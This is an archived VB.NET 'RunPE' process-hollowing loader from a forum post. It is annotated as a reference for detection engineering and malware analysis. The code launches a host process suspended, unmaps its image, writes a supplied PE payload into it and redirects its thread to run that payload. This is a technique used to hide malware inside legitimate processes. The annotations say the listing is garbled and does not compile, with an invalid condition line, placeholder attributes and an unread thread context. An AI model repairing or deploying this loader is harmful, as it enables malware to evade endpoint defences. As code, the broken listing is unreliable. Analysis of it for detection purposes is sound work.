[VB.NET] t0fx RunPe



Fabr3gas


' RunPE ("process hollowing") loader, archived from a forum post.
' Retained as a reference for detection engineering and malware analysis only. The
' API sequence below — CreateProcess(CREATE_SUSPENDED) -> ZwUnmapViewOfSection ->
' VirtualAllocEx -> WriteProcessMemory -> VirtualProtectEx -> SetThreadContext ->
' ResumeThread on the same child — is the classic hollowing signature that EDR and
' Sysmon/ETW rules key on.
' NOTE(review): the listing is garbled in several places (see inline comments) and
' does not compile as posted. It is deliberately NOT repaired here.
Class RunPE

    ' Win32 memory-protection constants. PAGE_READONLY is typed UInt32 while the
    ' others are Long; inconsistent, but harmless for how Protect() uses them.
    Public Const PAGE_NOCACHE As Long = &H200
    Public Const PAGE_EXECUTE_READWRITE As Long = &H40
    Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
    Public Const PAGE_EXECUTE_READ As Long = &H20
    Public Const PAGE_EXECUTE As Long = &H10
    Public Const PAGE_WRITECOPY As Long = &H8
    Public Const PAGE_NOACCESS As Long = &H1
    Public Const PAGE_READWRITE As Long = &H4
    Public Const PAGE_READONLY As System.UInt32 = &H2

    ' Launch `target` suspended and map the PE image held in `data` over it.
    '   data   : raw bytes of a PE file; only 32-bit (PE32) header layouts are read.
    '   target : command line of the host executable to start suspended.
    ' Returns nothing. Failures are silent: a failed CreateProcess returns early and
    ' every other Win32 return value is ignored.
    Shared Sub Execute(ByVal data() As Byte, ByVal target As String)
  Dim C = New H.Context, SH As H.Section_Header, PI = New H.Process_Information, SI = New H.Startup_Information, PS = New H.Security_Flags, TS = New H.Security_Flags
  ' Pin `data` so a raw address into it can be taken.
  Dim GC = System.Runtime.InteropServices.GCHandle.Alloc(data, System.Runtime.InteropServices.GCHandleType.Pinned)
  Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32
  Dim DH As New H.DOS_Header
  DH = System.Runtime.InteropServices.Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType)
  ' BUG (left as posted): the pin is released here, but `Buffer` is still used below
  ' for the NT-header and section-header reads. Once unpinned the GC may move `data`,
  ' so those reads go through a dangling address.
  GC.Free()
  ' flags = 4 is CREATE_SUSPENDED: the host starts with its main thread paused so its
  ' image can be replaced before any of its own code runs. CreateProcess is declared
  ' as returning Boolean, yet the result is compared against 0 here.
  If H.CreateProcess(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
  Dim NH As New H.NT_Headers
  ' DH.Address is e_lfanew, the file offset of the NT headers.
  NH = System.Runtime.InteropServices.Marshal.PtrToStructure(New System.IntPtr(Buffer + DH.Address), NH.GetType)
  Dim Address, Offset As Long, ret As UInteger
  ' Set after CreateProcess has already consumed SI, so it has no effect.
  SI.CB = Len(SI)
  ' 65538 = &H10002 = CONTEXT_i386 Or CONTEXT_INTEGER. GetThreadContext is declared
  ' in H but never called, so every other field of C (including Ebx, read below) is
  ' still zero when SetThreadContext is applied.
  C.Flags = 65538
  ' GARBLED LINE: "<23117>=" is not valid VB and the original condition is lost. The
  ' numbers suggest a sanity check that NH.Signature = 17744 (&H4550, "PE\0\0") and
  ' DH.Magic = 23117 (&H5A4D, "MZ") before the host's original image is unmapped.
  ' `Address` is also uninitialised (0) when passed to ZwUnmapViewOfSection.
  If NH.Signature <> 17744 Or DH.Magic <23117>= 0 And H.ZwUnmapViewOfSection(PI.Process, Address) >= 0 Then
    ' 12288 = &H3000 = MEM_COMMIT Or MEM_RESERVE; protect 4 = PAGE_READWRITE (see
    ' the constants above). The allocation is requested at the image's preferred
    ' base; there is no relocation handling, so if that address is unavailable the
    ' load simply does nothing (ImageBase = 0).
    Dim ImageBase As System.UInt32 = H.VirtualAllocEx(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4)
    If ImageBase <> 0 Then
    ' Copy the headers first: SizeOfHeaders bytes from the start of the file.
    H.WriteProcessMemory(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret)
    ' 248 = sizeof(IMAGE_NT_HEADERS32); the section table follows it, 40 bytes per entry.
    Offset = DH.Address + 248
    For I As Integer = 0 To NH.File.Sections - 1
    SH = System.Runtime.InteropServices.Marshal.PtrToStructure(New System.IntPtr(Buffer + Offset + I * 40), SH.GetType)
    ' VB array bounds are inclusive, so Raw has SH.Size + 1 elements; the last one is unused.
    Dim Raw(SH.Size) As Byte
    For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next
    ' Write the raw section data at its virtual address, then apply the page
    ' protection derived from the section's Characteristics. `Address` is passed
    ' where the declaration takes `old` ByVal, so the previous protection is never
    ' returned to the caller.
    H.WriteProcessMemory(PI.Process, ImageBase + SH.Address, Raw, SH.Size, ret)
    H.VirtualProtectEx(PI.Process, ImageBase + SH.Address, SH.Misc.Size, Protect(SH.Flags), Address)
    Next I
    ' Write the 4-byte image base at C.Ebx + 8 — presumably intended to be
    ' PEB.ImageBaseAddress (on x86 Ebx holds the PEB pointer at thread start), but
    ' C.Ebx is 0 here because the context was never read (see note above).
    Dim T = BitConverter.GetBytes(ImageBase)
    H.WriteProcessMemory(PI.Process, C.Ebx + 8, T, 4, ret)
    ' Redirect execution to ImageBase + AddressOfEntryPoint via Eax (presumably the
    ' register the x86 thread-start stub jumps through), then let the thread run.
    C.Eax = ImageBase + NH.Optional.Address
    H.SetThreadContext(PI.Thread, C)
    H.ResumeThread(PI.Thread)
    End If
  End If
    End Sub

    ' Logical right shift emulated with floating-point division (VB6 idiom).
    ' CAVEAT: the result is converted back to Long with VB's round-to-nearest, so
    ' this is not a true shift when the discarded low bits are >= half the divisor.
    Public Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
  RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
    End Function
    ' Reinterpret a signed 32-bit value as unsigned by adding 2^32 when negative.
    ' Returns a Double so the full 0..2^32-1 range is representable.
    Public Shared Function vbLongToULong(ByVal Value As Long) As Double
  Const OFFSET_4 = 4294967296.0#
  If Value < 0 Then
    vbLongToULong = Value + OFFSET_4
  Else
    vbLongToULong = Value
  End If
    End Function

    ' Map a section's Characteristics flags to a PAGE_* protection.
    ' The top three bits (IMAGE_SCN_MEM_EXECUTE = bit 29, MEM_READ = bit 30,
    ' MEM_WRITE = bit 31) index an 8-entry table: index bit0 = execute,
    ' bit1 = read, bit2 = write. Because RShift rounds rather than truncates,
    ' a section that also has bit 28 (IMAGE_SCN_MEM_SHARED) set may land one
    ' entry higher than intended.
    Public Shared Function Protect(ByVal characteristics As Long) As Long
  Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
  PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
  PAGE_READWRITE, PAGE_EXECUTE_READWRITE}
  Protect = mapping(RShift(characteristics, 29))
    End Function

    ' P/Invoke shims and PE/Win32 structure layouts used by Execute.
    ' The bare `<System>` attributes throughout are an archiving artefact — they
    ' appear to stand in for the original StructLayout/MarshalAs attributes, without
    ' which these structures will not marshal with the intended layout.
    <System> Friend Class H
  ' x86 CONTEXT (32-bit). Field names are abbreviated; D0..D7 are the debug
  ' registers, SG/SF/SE/SD the segment registers, SC = SegCs, SS = SegSs.
  <System> Structure Context
    Dim Flags, D0, D1, D2, D3, D6, D7 As System.UInt32, Save As Save
    Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As System.UInt32
    <System> Dim Registers As Byte()
  End Structure
  ' FLOATING_SAVE_AREA as embedded in the x86 CONTEXT.
  <System> Structure Save
    Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
    <System> Dim RegisterArea As Byte()
    Dim State As System.UInt32
  End Structure
  ' The Misc union of IMAGE_SECTION_HEADER (PhysicalAddress / VirtualSize).
  Structure Misc
    Dim Address, Size As System.UInt32
  End Structure
  ' IMAGE_SECTION_HEADER. Note `Name` is declared as a single Byte, not the
  ' 8-byte name field; Execute only reads Misc.Size, Address, Size, Pointer, Flags.
  Structure Section_Header
    Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As System.UInt32
  End Structure
  ' PROCESS_INFORMATION.
  Structure Process_Information
    Dim Process, Thread As System.IntPtr, ProcessId, ThreadId As Integer
  End Structure
  ' STARTUPINFO.
  <System> Structure Startup_Information
    Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
    Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
  End Structure
  ' SECURITY_ATTRIBUTES.
  <System> Structure Security_Flags
    Dim Length As Integer, Descriptor As System.IntPtr, Inherit As Integer
  End Structure
  ' IMAGE_DOS_HEADER; `Address` is e_lfanew.
  <System> Structure DOS_Header
    Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As System.UInt16
    <System> Dim ReservedA As System.UInt16()
    Dim ID, Info As System.UInt16
    <System> Dim ReservedB As System.UInt16()
    Dim Address As System.Int32
  End Structure
  ' IMAGE_NT_HEADERS32.
  Structure NT_Headers
    Dim Signature As System.UInt32, File As File_Header, [Optional] As Optional_Headers
  End Structure
  ' IMAGE_FILE_HEADER; `Sections` is NumberOfSections.
  <System> Structure File_Header
    Dim Machine, Sections As System.UInt16, Stamp, Table, Symbols As System.UInt32, Size, Flags As System.UInt16
  End Structure
  ' IMAGE_OPTIONAL_HEADER32 (PE32 only — has BaseOfData and a 4-byte ImageBase).
  ' Address = AddressOfEntryPoint, Image = ImageBase, SImage = SizeOfImage,
  ' SHeaders = SizeOfHeaders.
  <System> Structure Optional_Headers
    Public Magic As System.UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As System.UInt32, SectionA, FileA As System.UInt32
    Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As System.UInt16, Version, SImage, SHeaders, Checksum As System.UInt32, Subsystem, Flags As System.UInt16
    Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As System.UInt32
    <System> Public DataDirectory As Data_Directory()
  End Structure
  ' IMAGE_DATA_DIRECTORY.
  <System> Structure Data_Directory
    Dim Address, Size As System.UInt32
  End Structure
  ' Returns Boolean, but Execute compares the result to 0.
  Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As System.UInt32, ByVal system As System.IntPtr, ByVal current As String, <System> ByRef startup As Startup_Information, <System> ByRef info As Process_Information) As Boolean
  ' `written` is declared ByRef Integer; Execute passes a UInteger for it.
  Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal buffer As Byte(), ByVal size As System.IntPtr, <System> ByRef written As Integer) As Boolean
  ' Declared but unused in this listing.
  Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByRef buffer As System.IntPtr, ByVal size As System.IntPtr, ByRef read As Integer) As Integer
  ' `old` (lpflOldProtect) is declared ByVal, so the previous protection is never
  ' written back to the caller.
  Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal size As System.UIntPtr, ByVal [new] As System.UIntPtr, <System> ByVal old As System.UInt32) As Integer
  Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal size As System.UInt32, ByVal type As System.UInt32, ByVal protect As System.UInt32) As System.IntPtr
  ' Undocumented native API; declared as returning Long although NTSTATUS is 32-bit.
  Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As System.IntPtr, ByVal address As System.IntPtr) As Long
  Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As System.IntPtr) As System.UInt32
  ' Declared but never called by Execute (see the C.Flags comment there).
  Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As System.IntPtr, ByRef context As Context) As Boolean
  Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As System.IntPtr, ByRef context As Context) As Boolean
    End Class
End Class
